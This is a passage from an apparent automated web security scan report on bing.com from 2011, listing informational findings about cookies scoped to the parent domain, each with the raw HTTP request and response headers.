Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621031&D=1593447&AF=NOFORM; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:14 GMT
Connection: close
Set-Cookie: OrigMUID=; expires=Thu, 01-Feb-2001 17:11:14 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:14 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

16.228. http://www.bing.com/fd/ls/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/fd/ls/l

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:10 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=9874d115203d4525a6dc5f12136077f0&CID=F741A5D3C8544F77A0B57D8439E7E06E&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:3,%22FC%22:-1,%22BC%22:3,%22BS%22:10,%22H%22:12,%22C1%22:-1,%22C2%22:-1,%22BP%22:1000,%22KP%22:-1,%22CT%22:1019,%22IL%22:1}}&P=video&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/results.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=1; _FP=BDCE=129407839256968337&BDCEH=7BEF6608F1F2E27015D4037638CCD541; _SS=SID=4318D78D50E640FC90E674B1FECFA468; MUID=F741A5D3C8544F77A0B57D8439E7E06E; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9874d115203d4525a6dc5f12136077f0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=MS=1621019&D=1593447&AF=NOFORM

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:10 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:10 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

16.229. http://www.bing.com/finance/stockscreener previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/finance/stockscreener

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=965375748DDD4D8188E499C867CEF5C8; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c03e263debce44bb8933c4855c834e0ea; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /finance/stockscreener HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 128153
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 01:52:17 GMT
Connection: close
Set-Cookie: _SS=SID=965375748DDD4D8188E499C867CEF5C8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c03e263debce44bb8933c4855c834e0ea; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

16.230. http://www.bing.com/images/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/images/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/images
_SS=SID=284EF21770EF4BD0AA7FB9D61CA8CF78; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce493bb2b667d42a4bbbffd58ff8085dc; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62450
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:13 GMT
Connection: close
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/images
Set-Cookie: _SS=SID=284EF21770EF4BD0AA7FB9D61CA8CF78; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce493bb2b667d42a4bbbffd58ff8085dc; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

16.231. http://www.bing.com/local/ypdefault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/local/ypdefault.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=9C78E9D32BAB47298AA4173498A90C8F; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce83ec72017dc49e5ac26803c481780a7; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/ypdefault.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 57381
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:53:10 GMT
Last-Modified: Sat, 29 Jan 2011 23:53:10 GMT
X-BM-TraceID: ee663d132ace4420b9eab1478d59e8be
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001605
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:10 GMT
Connection: close
Set-Cookie: BID=234f29943060401f9ea3fd8c0fccd2b9; path=/local
Set-Cookie: CID=d7ba30d0ced2493187723ae5e97a11c0; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=1/29/2011 11:53:10 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _SS=SID=9C78E9D32BAB47298AA4173498A90C8F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce83ec72017dc49e5ac26803c481780a7; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...

16.232. http://www.bing.com/maps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=4FDEC46FE84D47C7A27357A4B60C2F21; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb39404c1e43b486e8819f4088dc7362c; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: aa4bb9bcb1bd4ee1b0f7f47adb778554
X-Ve-Server: CPK-01401-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: CPKM001401
Date: Sun, 30 Jan 2011 17:04:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=4FDEC46FE84D47C7A27357A4B60C2F21; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb39404c1e43b486e8819f4088dc7362c; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Content-Length: 117670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

16.233. http://www.bing.com/maps/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=A542DD3C69694894BF4BE6BD7321BB59; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca4184cfc9d4f4cccad735eb747233d7c; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621026&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 4921bce1e14044759548958ceb90d967
X-Ve-Server: EWR-01612-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001612
Date: Sun, 30 Jan 2011 17:06:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=A542DD3C69694894BF4BE6BD7321BB59; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca4184cfc9d4f4cccad735eb747233d7c; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621026&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Content-Length: 117393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

16.234. http://www.bing.com/maps/explore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/explore/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=A21BB79701BC4D8A8674B6637A0C1148; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5a0f31712a284b0fb357b1ff693d5880; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/explore/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43672
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01612
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001612
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:06 GMT
Connection: close
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _SS=SID=A21BB79701BC4D8A8674B6637A0C1148; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5a0f31712a284b0fb357b1ff693d5880; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...

16.235. http://www.bing.com/msnhomepagehistory.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/msnhomepagehistory.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /msnhomepagehistory.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: 91E11ED41EDC42D491A070AAB3F6B959 Ref B: 2975312DDC5A4D916D738818AD098869 Ref C: Sat Jan 29 15:53:31 2011
PST

16.236. http://www.bing.com/news/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296406958; domain=.bing.com; path=/
_SS=SID=555066E581BE46E4AA183A542A326C4A; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:38 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:02:39 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296406958; domain=.bing.com; path=/
Set-Cookie: _SS=SID=555066E581BE46E4AA183A542A326C4A; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:38 GMT; domain=.bing.com; path=/

16.237. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296407026; domain=.bing.com; path=/
_SS=SID=67AD5B53D3DE451B9E64A941694B912C; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621023&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:03:46 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:03:46 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296407026; domain=.bing.com; path=/
Set-Cookie: _SS=SID=67AD5B53D3DE451B9E64A941694B912C; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621023&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:03:46 GMT; domain=.bing.com; path=/

16.238. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=B97A28CBF38B449B9527EDAAE03B878F; domain=.bing.com; path=/
